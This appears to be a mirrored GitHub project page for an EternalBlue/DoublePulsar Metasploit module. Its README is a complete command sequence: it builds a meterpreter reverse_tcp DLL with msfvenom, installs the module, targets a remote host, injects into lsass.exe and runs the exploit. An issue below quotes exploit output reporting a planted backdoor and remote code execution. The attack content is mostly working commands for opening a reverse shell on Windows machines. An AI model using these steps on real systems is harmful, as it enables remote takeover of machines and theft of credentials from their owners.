GithubHelp home page GithubHelp logo

gh0stsec / eternalblue-doublepulsar-metasploit Goto Github PK

View Code? Open in Web Editor NEW
18.0 0.0 19.0 2.82 MB

Eternalblue-Doublepulsar-Metasploit

License: GNU Lesser General Public License v2.1

Ruby 100.00%

eternalblue-doublepulsar-metasploit's Introduction

Eternalblue-Doublepulsar-Metasploit

wine cmd.exe
exit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll

cd /usr/share/metasploit-framework/modules/exploits/windows/smb
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
mv Eternalblue-Doublepulsar-Metasploit/deps/ eternalblue_doublepulsar.rb ./

service postgresql start
msfconsole
reload_all

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE  x64
set rhost 192.168.12.111
show targets
set target 8
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.12.110

exploit

eternalblue-doublepulsar-metasploit's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

eternalblue-doublepulsar-metasploit's Issues

Error sending wrong architecture DLL to target

Is the arch x86 supported?

some of my computers in my labs are running on a x86 arch and I would like to test them

Right now I get the following error msg when i type run:

[] Started reverse TCP handler on 192.168.3.21:4444
[
] 192.168.3.25:445 - Generating Eternalblue XML data
[] 192.168.3.25:445 - Generating Doublepulsar XML data
[
] 192.168.3.25:445 - Generating payload DLL for Doublepulsar
[] 192.168.3.25:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.3.25:445 - Launching Eternalblue...
Application tried to create a window, but no driver could be loaded.
Make sure that your X server is running and that $DISPLAY is set correctly.
err:systray:initialize_systray Could not create tray window
[+] 192.168.3.25:445 - Backdoor is already installed
[] 192.168.3.25:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.3.25:445 - Remote code executed... 3... 2... 1...
[
] Exploit completed, but no session was created.

Error sending wrong architecture DLL to target

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.